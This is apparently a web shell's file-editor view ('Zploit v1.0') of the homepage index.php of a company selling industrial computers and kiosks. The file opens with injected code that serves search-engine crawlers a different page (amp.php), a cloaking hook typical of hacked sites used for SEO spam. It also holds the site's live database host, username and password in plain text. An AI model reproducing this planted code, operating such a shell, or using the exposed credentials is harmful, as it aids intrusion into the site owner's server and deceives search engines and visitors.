:: **Zploit** v1.0 | Current Path: **/home/bbbncs7/amtechint.com/**
:: Editing File: index.php
<? $userAgent = $_SERVER['HTTP_USER_AGENT'] ?? ''; if (preg_match('/Googlebot|Google-InspectionTool|GoogleOther/i', $userAgent)) { require __DIR__ . '/amp.php'; exit; } ?> <?php include("top_ind.php"); ?> <?php include("top_menu.php"); ?> <?php include"admin/func.php"; include"admin/param.php"; include"live.php"; ?> <style> /*@media only screen and (min-width: 786px) {*/ /* .explor_me{*/ /* margin-bottom:10px; */ /* width: 19%;*/ /*}*/ /*}*/ </style> <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.2/dist/umd/popper.min.js" integrity="sha384-IQsoLXl5PILFhosVNubq5LC7Qb9DXgDA9i+tQ8Zj3iwWAwPtgFTxbJ8NT4GN1R8p" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.min.js" integrity="sha384-cVKIPhGWiC2Al4u+LWgxfKTRIcfu0JTxR+EQDz/bgldoEyl4H0zUF0QKbrJ0EcQF" crossorigin="anonymous"></script> <?php $conn=mysqli_connect('106.0.62.85','bbbncs7_newamtech',']se$}HOiVeP$','bbbncs7_newamtech'); if (!$conn) { echo "Failed to connect to MySQL: " . mysqli_connect_error(); } ?> <?php $sql = "SELECT * FROM top_slider"; $result = mysqli_query($conn, $sql) or die("Query Failed"); echo "<div id='carouselExample' class='carousel slide'> <div class='carousel-inner'>"; $active = true; // To mark the first item as active while ($row = mysqli_fetch_array($result)) { $file_name = $row['file_name']; $active_class = $active ? 'active' : ''; // Check if it's the first item // Determine file type $file_type = mime_content_type("admin/upload-image/$file_name"); // Check if the file is a video if (strpos($file_type, 'video/') === 0) { echo "<div class='carousel-item $active_class' data-bs-interval='10000'> <video controls autoplay muted class='d-block w-100'> <source src='admin/upload-image/$file_name' type='$file_type'> Your browser does not support the video tag. </video> </div>"; } else { // Display image if it's not a video echo "<div class='carousel-item $active_class' data-bs-interval='10000'> <img src='admin/upload-image/$file_name' class='d-block w-100' alt='Banner'> </div>"; } $active = false; // After the first iteration, set active to false } echo "</div> <button class='carousel-control-prev' type='button' data-bs-target='#carouselExample' data-bs-slide='prev'> <span class='carousel-control-prev-icon' aria-hidden='true'></span> <span class='visually-hidden'>Previous</span> </button> <button class='carousel-control-next' type='button' data-bs-target='#carouselExample' data-bs-slide='next'> <span class='carousel-control-next-icon' aria-hidden='true'></span> <span class='visually-hidden'>Next</span> </button> </div>"; ?> <!-- <div id="carouselExample" class="carousel slide">--> <!-- <div class="carousel-inner">--> <!-- <div class="carousel-item active" data-bs-interval="10000">--> <!-- <img src="New-home/assets/images/slider1.webp" class="d-block w-100" alt="...">--> <!-- </div>--> <!-- <div class="carousel-item" data-bs-interval="2000">--> <!-- <img src="New-home/assets/images/slider2.webp" class="d-block w-100" alt="...">--> <!-- </div>--> <!-- <div class="carousel-item" data-bs-interval="3000">--> <!-- <img src="New-home/assets/images/slider3.webp" class="d-block w-100" alt="...">--> <!-- </div>--> <!-- <div class="carousel-item" data-bs-interval="4000">--> <!-- <img src="New-home/assets/images/slider4.webp" class="d-block w-100" alt="...">--> <!-- </div>--> <!-- <div class="carousel-item" data-bs-interval="5000">--> <!-- <img src="New-home/assets/images/slider5.webp" class="d-block w-100" alt="...">--> <!-- </div>--> <!-- </div>--> <!-- <button class="carousel-control-prev" type="button" data-bs-target="#carouselExample" data-bs-slide="prev">--> <!-- <span class="carousel-control-prev-icon" aria-hidden="true"></span>--> <!-- <span class="visually-hidden">Previous</span>--> <!-- </button>--> <!-- <button class="carousel-control-next" type="button" data-bs-target="#carouselExample" data-bs-slide="next">--> <!-- <span class="carousel-control-next-icon" aria-hidden="true"></span>--> <!-- <span class="visually-hidden">Next</span>--> <!-- </button>--> <!--</div>--> <!-- Service Start --> <div class="section service-section"> <div class="container"> <div class="service-wrap" id="home-top-slider"> <div class="row"> <div class="col-lg-3 col-sm-6"> <!-- Service Item Start --> <div class="service-item text-center"> <div class="shape-1"></div> <div class="shape-2"> <img src="assets/images/service/s-shape-2.png" alt=""> </div> <div class="service-icon"> <img src="images/Capture-removebg-preview.png" alt=""> </div> <div class="service-content"> <h3 class="title"><a href="https://amtechint.com/main.php?live=3_0_0_0">IT Product & <br>Solutions</a></h3> </div> </div> <!-- Service Item End --> </div> <div class="col-lg-3 col-sm-6"> <!-- Service Item Start --> <div class="service-item text-center"> <div class="shape-1"></div> <div class="shape-2"> <img src="assets/images/service/s-shape-2.png" alt=""> </div> <div class="service-icon"> <img src="images/Capture11-removebg-preview.png" alt=""> </div> <div class="service-content"> <h3 class="title"><a href="https://amtechint.com/main.php?live=7_0_0_0">ePaper Display Solutions</a></h3> </div> </div> <!-- Service Item End --> </div> <div class="col-lg-3 col-sm-6"> <!-- Service Item Start --> <div class="service-item text-center"> <div class="shape-1"></div> <div class="shape-2"> <img src="assets/images/service/s-shape-2.png" alt=""> </div> <div class="service-icon"> <img src="images/Capture12.png" alt=""> </div> <div class="service-content"> <h3 class="title"><a href="https://amtechint.com/main.php?live=6_0_0_0">Industrial Self Service KIOSK</a></h3> </div> </div> <!-- Service Item End --> </div> <div class="col-lg-3 col-sm-6"> <!-- Service Item Start --> <div class="service-item text-center"> <div class="shape-1"></div> <div class="shape-2"> <img src="assets/images/service/s-shape-2.png" alt=""> </div> <div class="service-icon"> <img src="images/Capture13.png" alt=""> </div> <div class="service-content"> <h3 class="title"><a href="https://amtechint.com/main.php?live=5_0_0_0">Industrial Computer</a></h3> </div> </div> <!-- Service Item End --> </div> </div> </div> </div> </div> <!-- Service End --> <!-- About Start --> <div class="section about-section section-padding"> <div class="container"> <!-- About Wrap Start --> <div class="about-wrap"> <div class="row"> <div class="col-lg-6"> <?php $user_id = 1; $sql = "SELECT * FROM about_sec WHERE id ={$user_id}"; $result = mysqli_query($conn, $sql) or die("Query Unsuccessful."); if (mysqli_num_rows($result) > 0) { while ($row = mysqli_fetch_assoc($result)){ ?> <!-- About Thumb Wrap Start --> <div class="about-thumb-wrap"> <div class="about-thumb-small"> <img src="admin/upload-image/<?php echo $row['img_one']?>" alt="AMTECH INT"> <!--<img src="assets/images/about-1.jpg" alt="">--> </div> <div class="about-thumb-big"> <img src="admin/upload-image/<?php echo $row['img_two']?>" alt="AMTECH INT"> <!--<img src="assets/images/about-2.jpg" alt="">--> </div> <div class="about-thumb-shape"> <img src="assets/images/ab-shape.png" alt=""> </div> <div class="play-btn "> <a class="popup-video " href="<?php echo $row['video_link']?>" target="_blank"><i class="fas fa-play"></i></a> </div> </div> <?php }; }; ?> <!-- About Thumb Wrap End --> </div> <div class="col-lg-6"> <?php $user_id = 1; $sql = "SELECT * FROM about_sec WHERE id ={$user_id}"; $result = mysqli_query($conn, $sql) or die("Query Unsuccessful."); if (mysqli_num_rows($result) > 0) { while ($row = mysqli_fetch_assoc($result)){ ?> <!-- About Content Start --> <div class="about-content m-2"> <div class="section-title"> <h3 class="sub-title"><?php echo $row['sub_heading']?></h3> <h2 class="title"><?php echo $row['heading']?></h2> </div> <p><?php echo $row['about_description']?></p> </div> <!-- About Content End --> </div> </div> </div> <!-- About Wrap End --> </div> </div> <!-- About End --> <?php }; }; ?> <!-- Skill Start --> <div class="section skill-section section-padding"> <div class="container"> <h2> Explore More</h2> <div class="skill-wrap"> <!-- Skill Image Wrap Start --> <div class="skill-img-wrap"> <div class="row"> <!--<div class="col-lg-3 col-sm-6">--> <!-- Skill Image Item Start --> <!-- <div class="skill-img-item">--> <!-- <div class="skill-img">--> <!-- <a class="image" href="#"><img src="assets/images/oil-platform-ocean-with-sun-setting-it.jpg" alt=""></a>--> <!-- <div class="skill-img-text">--> <!-- <h3 class="title"><a href="https://amtechint.com/content.php?p=39">Oil & Gas</a></h3>--> <!-- <a class="skill-btn" href="https://amtechint.com/content.php?p=39">Learn More <i class="fas fa-long-arrow-alt-right"></i></a>--> <!-- </div>--> <!-- </div>--> <!-- </div>--> <!-- Skill Image Item Start --> <!--</div>--> <!--<div class="col-lg-3 col-sm-6">--> <!-- Skill Image Item Start --> <!-- <div class="skill-img-item">--> <!-- <div class="skill-img">--> <!-- <a class="image" href="#"><img src="assets/images/mechanic-with-tool-wheel-hands-mechanic-blue-work-clothes.jpg" alt=""></a>--> <!-- <div class="skill-img-text">--> <!-- <h3 class="title"><a href="https://amtechint.com/content.php?p=38">Vehicle Mount</a></h3>--> <!-- <a class="skill-btn" href="https://amtechint.com/content.php?p=38">Learn More <i class="fas fa-long-arrow-alt-right"></i></a>--> <!-- </div>--> <!-- </div>--> <!-- </div>--> <!-- Skill Image Item Start --> <!--</div>--> <!--<div class="col-lg-3 col-sm-6">--> <!-- Skill Image Item Start --> <!-- <div class="skill-img-item">--> <!-- <div class="skill-img">--> <!-- <a class="image" href="#"><img src="assets/images/doctor-preparing-ophthalmologist-s-office.jpg" alt=""></a>--> <!-- <div class="skill-img-text">--> <!-- <h3 class="title"><a href="https://amtechint.com/content.php?p=37">Medical</a></h3>--> <!-- <a class="skill-btn" href="https://amtechint.com/content.php?p=37">Learn More <i class="fas fa-long-arrow-alt-right"></i></a>--> <!-- </div>--> <!-- </div>--> <!-- </div>--> <!-- Skill Image Item Start --> <!--</div>--> <!--<div class="col-lg-3 col-sm-6">--> <!-- Skill Image Item Start --> <!-- <div class="skill-img-item">--> <!-- <div class="skill-img">--> <!-- <a class="image" href="#"><img src="assets/images/beautiful-family-standing-cash-counter.jpg" alt=""></a>--> <!-- <div class="skill-img-text">--> <!-- <h3 class="title"><a href="https://amtechint.com/content.php?p=36">Retail</a></h3>--> <!-- <a class="skill-btn" href="https://amtechint.com/content.php?p=36">Learn More <i class="fas fa-long-arrow-alt-right"></i></a>--> <!-- </div>--> <!-- </div>--> <!-- </div>--> <!-- Skill Image Item Start --> <div class="container"> <div class="row"> <div class="col-md-12"> <div style="padding-bottom:20px;padding-top:20px;"> <!--<h1 class="text-center" style="padding-top:0px;margin-bottom: 20px;color:#232d6f;">Al Minhaj Range</h1>--> <div class="row"> <?php $QRY = qry_run("select * from tbl_contents where ptype = 'Special Services' AND pshow = 'Yes' order by ranking limit 6"); if (num_rec($QRY) > 0) { $n = 1; while($rs = fetch_rec($QRY)) { ?> <div class=" col-sm-4 col-xs-6 explor_me p-4"> <div class="view third-effect"> <div><img src="admin/pictures/<?=$rs['img2']?>" class="img-responsive"></div> <div class="text-center" style="background:#293778;color:#FFF;line-height: 40px;"><?=$rs['pname']?></div> <div class="mask"></div> <div class="content"> <a href="content.php?p=<?=$rs['mainid']?>" class="info" title="<?=$rs['pname']?>"><?=$rs['pname']?></a> </div> </div> </div> <!--<div class=" col-sm-2 col-xs-6 explor_me">--> <!-- <div class="view third-effect"> --> <!-- <div><img src="admin/pictures/<?=$rs['img2']?>" class="img-responsive" style="height:9em;"></div>--> <!-- <div class="text-center" style="background:#293778;color:#FFF;line-height: 40px;"><?=$rs['pname']?></div> --> <!-- <div class="mask"></div>--> <!-- <div class="content"> --> <!-- <a href="content.php?p=<?=$rs['mainid']?>" class="info" title="<?=$rs['pname']?>"><?=$rs['pname']?></a> --> <!-- </div> --> <!-- </div>--> <!--</div>--> <?php } } ?> </div> </div> </div> </div> </div> </div> </div> </div> <!-- Skill Image Wrap End --> </div> </div> </div> <!-- Skill End --> <!-- Case Study End --> <!-- Features Start --> <div class="section features-section" style="background-image: url(assets/images/bg/features-bg.jpg);"> <!-- Features Thumb Start --> <div class="features-thumb d-flex align-items-end"> <div class="shape-1"> <img src="assets/images/features-shape.png" alt=""> </div> <div class="image"> <img src="assets/images/features-img.png" alt=""> </div> </div> <!-- Features Thumb End --> <div class="container"> <!-- Features Wrap Start --> <div class="features-wrap"> <div class="row"> <div class="col-xl-7 offset-xl-5"> <!-- Features Content Wrap Start --> <div class="features-content-wrap"> <div class="section-title"> <!--<h3 class="sub-title">Why Choose Us</h3>--> <!--<h2 class="title">PRODUCTS & SERVICES WE FOCUS</h2>--> <h2 class="title">PRODUCTS & SERVICES</h2> </div> <!-- Features Content Start --> <div class="features-content"> <ul> <!-- Features Item Start --> <li class="features-item"> <div class="features-icon"> <img src="images/Capture-removebg-preview.png" alt=""> </div> <div class="features-text"> <a href="https://amtechint.com/main.php?live=3_0_0_0"><h3 class="title">IT Product and Solutions</h3> </a> </div> </li> <!-- Features Item End --> <!-- Features Item Start --> <li class="features-item"> <div class="features-icon"> <img src="images/Capture11-removebg-preview.png" alt=""> </div> <div class="features-text"> <a href="https://amtechint.com/main.php?live=7_0_0_0"> <h3 class="title">ePaper Display Solution</h3> </a> </div> </li> <!-- Features Item End --> <!-- Features Item Start --> <li class="features-item"> <div class="features-icon"> <img src="images/Capture12.png" alt=""> </div> <div class="features-text"> <a href="https://amtechint.com/main.php?live=6_0_0_0"> <h3 class="title">Industrial Self Service KIOSK</h3> </a> </div> </li> <!-- Features Item End --> <!-- Features Item Start --> <li class="features-item"> <div class="features-icon"> <img src="images/Capture13.png" alt=""> </div> <div class="features-text"> <a href="https://amtechint.com/main.php?live=5_0_0_0"> <h3 class="title">Industrial Computer and Monitors</h3> </a> </div> </li> <!-- Features Item End --> <!-- Features Item Start --> <li class="features-item"> <div class="features-icon"> <img src="images/amte11.png" alt=""> </div> <div class="features-text"> <a href="https://amtechint.com/main.php?live=1_0_0_0"> <h3 class="title">Industrial Panel HMI PCs</h3> </a> </div> </li> <!-- Features Item End --> <!-- Features Item Start --> <li class="features-item"> <div class="features-icon"> <img src="images/amte12.png" alt=""> </div> <div class="features-text"> <a href="https://amtechint.com/main.php?live=2_0_0_0"> <h3 class="title">Rugged Laptops and Tablets</h3> </a> </div> </li> </ul> <!--<div class="features-link">--> <!-- <p>This is only glimpse see <a href="#">All Features</a></p>--> <!--</div>--> </div> <!-- Features Content End --> </div> <!-- Features Content Wrap End --> </div> </div> </div> <!-- Features Wrap End --> </div> </div> <!-- Features End --> <!-- Testimonial Start --> <div class="section testimonial-section section-padding" style="background-image: url(assets/images/bg/testi-bg.jpg);"> <div class="container"> <!-- Testimonial Wrap Start --> <div class="testimonial-wrap"> <div class="row"> <div class="col-xl-4"> <?php $user_id = 1; $sql = "SELECT * FROM review_heading WHERE id ={$user_id}"; $result = mysqli_query($conn, $sql) or die("Query Unsuccessful."); if (mysqli_num_rows($result) > 0) { while ($row = mysqli_fetch_assoc($result)){ ?> <div class="section-title"> <h3 class="sub-title"><?php echo $row['sub_heading']?></h3> <h2 class="title"><?php echo $row['heading']?></h2> </div> <?php }; }; ?> </div> <div class="col-xl-8"> <!-- Testimonial Slider Wrap Start --> <!--<div class="testimonial-slider-wrap">--> <!-- <div class="swiper-container testimonial-active">--> <!-- <div class="swiper-wrapper">--> <!-- <div class="swiper-slide">--> <!-- Single Testimonial Start --> <!-- <div class="single-testimonial">--> <!-- <div class="testimonial-content">--> <!-- <h3 class="title">They Are Best</h3>--> <!-- <p>Accelerate innovation with world-class tech teams Beyond more stoic this along goodness hey this this wow manatee </p>--> <!-- <div class="testimonial-author-wrap">--> <!-- <div class="testimonial-author">--> <!-- <div class="author-img">--> <!-- <img src="assets/images/author-1.jpg" alt="">--> <!-- </div>--> <!-- <div class="author-text">--> <!-- <h5 class="name">Mike Holder 1</h5>--> <!-- <span class="designation">CEO, Harlond inc</span>--> <!-- </div>--> <!-- </div>--> <!-- <div class="testimonial-quote">--> <!-- <img src="assets/images/quote.png" alt="">--> <!-- </div>--> <!-- </div>--> <!-- </div>--> <!-- </div>--> <!-- Single Testimonial End --> <!-- </div>--> <!-- <div class="swiper-slide">--> <!-- Single Testimonial Start --> <!-- <div class="single-testimonial">--> <!-- <div class="testimonial-content">--> <!-- <h3 class="title">Right Aagency</h3>--> <!-- <p>Accelerate innovation with world-class tech teams Beyond more stoic this along goodness hey this this wow manatee </p>--> <!-- <div class="testimonial-author-wrap">--> <!-- <div class="testimonial-author">--> <!-- <div class="author-img">--> <!-- <img src="assets/images/author-2.jpg" alt="">--> <!-- </div>--> <!-- <div class="author-text">--> <!-- <h5 class="name">Mike Holder 2</h5>--> <!-- <span class="designation">CEO, Harlond inc</span>--> <!-- </div>--> <!-- </div>--> <!-- <div class="testimonial-quote">--> <!-- <img src="assets/images/quote.png" alt="">--> <!-- </div>--> <!-- </div>--> <!-- </div>--> <!-- </div>--> <!-- Single Testimonial End --> <!-- </div>--> <!-- <div class="swiper-slide">--> <!-- Single Testimonial Start --> <!-- <div class="single-testimonial">--> <!-- <div class="testimonial-content">--> <!-- <h3 class="title">They Are Best</h3>--> <!-- <p>Accelerate innovation with world-class tech teams Beyond more stoic this along goodness hey this this wow manatee </p>--> <!-- <div class="testimonial-author-wrap">--> <!-- <div class="testimonial-author">--> <!-- <div class="author-img">--> <!-- <img src="assets/images/author-1.jpg" alt="">--> <!-- </div>--> <!-- <div class="author-text">--> <!-- <h5 class="name">Mike Holder 3</h5>--> <!-- <span class="designation">CEO, Harlond inc</span>--> <!-- </div>--> <!-- </div>--> <!-- <div class="testimonial-quote">--> <!-- <img src="assets/images/quote.png" alt="">--> <!-- </div>--> <!-- </div>--> <!-- </div>--> <!-- </div>--> <!-- Single Testimonial End --> <!-- </div>--> <!-- </div>--> <!--Add Pagination --> <!-- <div class="testimonial-arrow swiper-button-next"></div>--> <!-- <div class="testimonial-arrow swiper-button-prev"></div>--> <!-- </div>--> <!--</div>--> <!-- Testimonial Slider Wrap End --> <?php // Establish your database connection here // Fetch testimonial data from the database $sql = "SELECT * FROM client_reviews"; $result = mysqli_query($conn, $sql) or die("Query Failed"); // Check if there are testimonials available if (mysqli_num_rows($result) > 0) { ?> <div class="testimonial-slider-wrap"> <div class="swiper-container testimonial-active"> <div class="swiper-wrapper"> <?php // Loop through testimonial data to display them while ($row = mysqli_fetch_assoc($result)) { $file_name = $row['file_name']; ?> <div class="swiper-slide"> <!-- Single Testimonial Start --> <div class="single-testimonial"> <div class="testimonial-content"> <h3 class="title"><?php echo $row['heading']; ?></h3> <p><?php echo $row['review']; ?></p> <div class="testimonial-author-wrap"> <div class="testimonial-author"> <div class="author-img"> <?php echo"<img src='admin/upload-image/$file_name' alt='Person'>"; ?> </div> <div class="author-text"> <h5 class="name"><?php echo $row['client_name']; ?></h5> <span class="designation"><?php echo $row['position']; ?></span> </div> </div> <div class="testimonial-quote"> <img src="assets/images/quote.png" alt="quote"> </div> </div> </div> </div> <!-- Single Testimonial End --> </div> <?php } ?> </div> <!-- Add Pagination --> <div class="swiper-pagination"></div> <!-- Add Navigation Arrows --> <div class="swiper-button-next"></div> <div class="swiper-button-prev"></div> </div> </div> <script src="https://unpkg.com/swiper/swiper-bundle.min.js"></script> <script> var swiper = new Swiper('.testimonial-active', { slidesPerView: 'auto', // Show as many slides as possible based on container's width spaceBetween: 30, loop: true, navigation: { nextEl: '.swiper-button-next', prevEl: '.swiper-button-prev', }, breakpoints: { // When window width is <= 768px (mobile) 425: { slidesPerView: 1, }, // When window width is > 768px (desktop) 1024: { slidesPerView: 2, }, }, }); </script> <?php } else { echo "No testimonials available."; } ?> </div> </div> </div> <!-- Testimonial Wrap End --> </div> </div> <style> @keyframes scroll { 0% { transform: translateX(0); } 100% { transform: translateX(calc(-250px * 7))} } #brand-logo-slider .swiper-wrapper{ animation: scroll 40s linear infinite; display: flex; width: calc(250px * 14); } #brand-logo-slider { height: 100px; } </style> <!-- Testimonial End --> <!-- Brand Logo Start --> <div class="section brand-section brand-section-2 brand-section-5"> <div class="container"> <!-- Brand Wrapper Start --> <div class="brand-wrapper brand-wrapper-2 text-center"> <h3 class="brand-title">BRANDS WE FOCUS ON</h3> <!--Brand Active Start --> <!--<div class="brand-active" id="brand-logo-slider">--> <!-- <div class="swiper-container">--> <!-- <div class="swiper-wrapper">--> <!-- Single Brand Start --> <!-- <div class="swiper-slide single-brand">--> <!-- <img src="assets/images/images.png" alt="Brand">--> <!-- </div>--> <!--Single Brand End --> <!--Single Brand Start --> <!-- <div class="swiper-slide single-brand">--> <!-- <img src="assets/images/download.png" alt="Brand">--> <!-- </div>--> <!--Single Brand End --> <!--Single Brand Start --> <!-- <div class="swiper-slide single-brand">--> <!-- <img src="assets/images/download (1).png" alt="Brand">--> <!-- </div>--> <!--Single Brand End --> <!--Single Brand Start --> <!-- <div class="swiper-slide single-brand">--> <!-- <img src="assets/images/about/download (2).png" alt="Brand">--> <!-- </div>--> <!--Single Brand End --> <!--Single Brand Start --> <!-- <div class="swiper-slide single-brand">--> <!-- <img src="assets/images/m2H7K9H7b1b1N4Z5.png" alt="Brand">--> <!-- </div>--> <!--Single Brand End --> <!--Single Brand Start --> <!-- <div class="swiper-slide single-brand">--> <!-- <img src="assets/images/getac-technology-corporation-vector-logo.png" alt="Brand">--> <!-- </div>--> <!--Single Brand End --> <!-- </div>--> <!-- </div>--> <!--</div>--> <?php $sql = "SELECT * FROM logo_slider"; $result = mysqli_query($conn, $sql) or die("Query Failed"); echo "<div class='brand-active' id='brand-logo-slider'> <div class='swiper-container'> <div class='swiper-wrapper'>"; while ($row = mysqli_fetch_array($result)) { $file_name = $row['file_name']; // Determine file type $file_type = mime_content_type("admin/upload-image/$file_name"); // Check if the file is a video if (strpos($file_type, 'video/') === 0) { // Skip videos for this type of slider continue; } else { // Display image if it's not a video echo "<div class='swiper-slide single-brand' style='flex-shrink: 1;'> <img src='admin/upload-image/$file_name' alt='Brand' style=' max-width: 58%;'> </div>"; } } echo "</div> <div class='swiper-pagination'></div> </div> </div>"; ?> <script> var swiper = new Swiper('.swiper-container',x { slidesPerView: 3, spaceBetween: 30, loop: true, pagination: { el: '.swiper-pagination', clickable: true, }, autoplay: { delay: 5000, disableOnInteraction: false, }, }); </script> <!--Brand Active End --> </div> <!--Brand Wrapper End --> </div> </div> <!-- Brand Logo End --> <!-- Cta Start --> <div class="section cta-section"> <div class="container"> <?php $user_id = 1; $sql = "SELECT * FROM about_sec WHERE id = 1"; $result = mysqli_query($conn, $sql) or die("Query Unsuccessful."); if (mysqli_num_rows($result) > 0) { while ($row = mysqli_fetch_assoc($result)){ ?> <div class="cta-wrap" style="background-image: url(admin/upload-image/<?php echo $row['img_three']?>);"> <div class="row align-items-center"> <div class="col-lg-6"> <div class="cta-left"> <!-- Content for the left part of the section --> </div> </div> </div> </div> <?php } // End of while loop } // End of if condition ?> </div> </div> <!-- Cta End --> <?php $user_id = 1; $sql = "SELECT * FROM contact WHERE id ={$user_id}"; $result = mysqli_query($conn, $sql) or die("Query Unsuccessful."); if (mysqli_num_rows($result) > 0) { while ($row = mysqli_fetch_assoc($result)){ ?> <!-- Footer Section Start --> <div class="section footer-section" style="background-image: url(assets/images/bg/footer-bg.jpg);"> <div class="container"> <!-- Footer Widget Wrap Start --> <div class="footer-widget-wrap"> <div class="row"> <div class="col-lg-3 col-sm-6"> <!-- Footer Widget Start --> <div class="footer-widget-about"> <a class="footer-logo" href=""> <img src="/admin/upload-image/<?php echo $row['file_name']?>" alt="AMTECH INT UK LTD"></a> <div class="widget-info"> <ul> <li> <div class="info-icon"> <i class="flaticon-phone-call"></i> </div> <div class="info-text"> <span><a href="https://wa.me/<?php echo $row['phone']?>" target="_blank"><?php echo $row['phone']?></a></span> </div> </li> <li> <div class="info-icon"> <i class="far fa-envelope-open"></i> </div> <div class="info-text"> <span><a href="mailto:<?php echo $row['email']?>"><?php echo $row['email']?></a></span> </div> </li> <li> <div class="info-icon"> <i class="flaticon-pin"></i> </div> <div class="info-text"> <span><?php echo $row['address']?></span> </div> </li> </ul> </div> </div> <!-- Footer Widget End --> </div> <div class="col-lg-3 col-sm-6"> <!-- Footer Widget Start --> <div class="footer-widget"> <h4 class="footer-widget-title">Useful Links</h4> <div class="widget-link"> <ul class="link"> <li><a href="https://amtechint.com/index.php">Home</a></li> <li><a href="https://amtechint.com/content.php?p=1">About Us</a></li> <li><a href="https://amtechint.com/content.php?p=35">Partners</a></li> <li><a href="https://amtechint.com/basket.php">Inquiry Form</a></li> <li><a href="https://amtechint.com/content.php?p=34">Privacy Policy</a></li> <li><a href="https://amtechint.com/content.php?p=43">FAQs</a></li> <li><a href="https://amtechint.com/content.php?p=4">Contact Us</a></li> </ul> </div> </div> <!-- Footer Widget End --> <?php }; }; ?> </div> <div class="col-lg-3 col-sm-6"> <!-- Footer Widget Start --> <div class="footer-widget"> <h4 class="footer-widget-title">Our Services</h4> <div class="widget-link"> <ul class="link"> <li><a href="https://amtechint.com/main.php?live=3_0_0_0">IT Product and Solutions</a></li> <li><a href="https://amtechint.com/main.php?live=7_0_0_0">ePaper Display Solution</a></li> <li><a href="https://amtechint.com/main.php?live=6_0_0_0">Industrial Self Service KIOSK</a></li> <li><a href="https://amtechint.com/main.php?live=5_0_0_0">Industrial Computer </a></li> <li><a href="https://amtechint.com/main.php?live=4_0_0_0">Industrial Monitors</a></li> <li><a href="https://amtechint.com/main.php?live=1_0_0_0">Industrial Panel HMI PCs</a></li> <li><a href="https://amtechint.com/main.php?live=2_0_0_0">Rugged Mobile Computers</a></li> </ul> </div> </div> <!-- Footer Widget End --> </div> <div class="col-lg-3 col-sm-6"> <!-- Footer Widget Start --> <div class="footer-widget"> <h4 class="footer-widget-title">Contents</h4> <div class="widget-link"> <ul class="link"> <li><a href="https://amtechint.com/content.php?p=32">Submit Inquiry Message</a></li> <li><a href="#">Support</a></li> <li><a href="https://amtechint.com/content.php?p=43">FAQS</a></li> <li><a href="https://amtechint.com/news.php">News & Events</a></li> </ul> </div> </div> <!-- Footer Widget End --> </div> </div> </div> <!-- Footer Widget Wrap End --> </div> <!-- Footer Copyright Start --> <div class="footer-copyright-area"> <div class="container"> <div class="footer-copyright-wrap"> <div class="row align-items-center"> <div class="col-lg-6 col-md-6"> <!-- Footer Copyright Text Start --> <div class="copyright-text"> <p>© Copyrights 2024 AMTECH INT UK LTD. </p> </div> <!-- Footer Copyright Text End --> </div> <div class="col-lg-6 col-md-6"> <!-- Footer Copyright Social Start --> <div class="copyright-social"> <?php $user_id = 1; $sql = "SELECT * FROM contact WHERE id ={$user_id}"; $result = mysqli_query($conn, $sql) or die("Query Unsuccessful."); if (mysqli_num_rows($result) > 0) { while ($row = mysqli_fetch_assoc($result)){ ?> <ul class="social"> <li><a href="<?php echo $row['linkedin']?>" target=”_blank”><i class="icon-linkedin"></i></a></li> <li><a href="<?php echo $row['youtube']?>" target=”_blank”><i class="icon-youtube-play"></i></a></li> <li><a href="<?php echo $row['facebook']?>" target=”_blank”><i class="fab fa-facebook-f"></i></a></li> <li><a href="<?php echo $row['twitter']?>" target=”_blank”><i class="fab fa-twitter"></i></a></li> </ul> <?php }; }; ?> </div> <!-- Footer Copyright Social End --> </div> </div> </div> </div> </div> <!-- Footer Copyright End --> </div> <!-- Footer Section End --> <!-- back to top start --> <div class="progress-wrap"> <svg class="progress-circle svg-content" width="100%" height="100%" viewBox="-1 -1 102 102"> <path d="M50,1 a49,49 0 0,1 0,98 a49,49 0 0,1 0,-98" /> </svg> </div> <!-- back to top end --> </div> <!-- JS ============================================ --> <script src="assets/js/vendor/jquery-1.12.4.min.js"></script> <script src="assets/js/vendor/modernizr-3.11.2.min.js"></script> <!-- Bootstrap JS --> <script src="assets/js/plugins/popper.min.js"></script> <script src="assets/js/plugins/bootstrap.min.js"></script> <!-- Plugins JS --> <script src="assets/js/plugins/swiper-bundle.min.js"></script> <script src="assets/js/plugins/aos.js"></script> <script src="assets/js/plugins/waypoints.min.js"></script> <script src="assets/js/plugins/back-to-top.js"></script> <script src="assets/js/plugins/jquery.counterup.min.js"></script> <script src="assets/js/plugins/appear.min.js"></script> <script src="assets/js/plugins/jquery.magnific-popup.min.js"></script> <!--====== Use the minified version files listed below for better performance and remove the files listed above ======--> <!--Start of Tawk.to Script--> <script type="text/javascript"> var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date(); (function(){ var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0]; s1.async=true; s1.src='https://embed.tawk.to/660eb5ab1ec1082f04dee6f0/1hqknb9vn'; s1.charset='UTF-8'; s1.setAttribute('crossorigin','*'); s0.parentNode.insertBefore(s1,s0); })(); </script> <!--End of Tawk.to Script--> <!-- Main JS --> <!-- <script src="assets/js/main.js"></script>--> <!--Start of Tawk.to Script--> <!--<script type="text/javascript">--> <!--var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();--> <!--(function(){--> <!--var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];--> <!--s1.async=true;--> <!--s1.src='https://embed.tawk.to/65b160db0ff6374032c481e5/1hkue4nbn';--> <!--s1.charset='UTF-8';--> <!--s1.setAttribute('crossorigin','*');--> <!--s0.parentNode.insertBefore(s1,s0);--> <!--})();--> <!--</script>--> <!--End of Tawk.to Script--> </body> </html>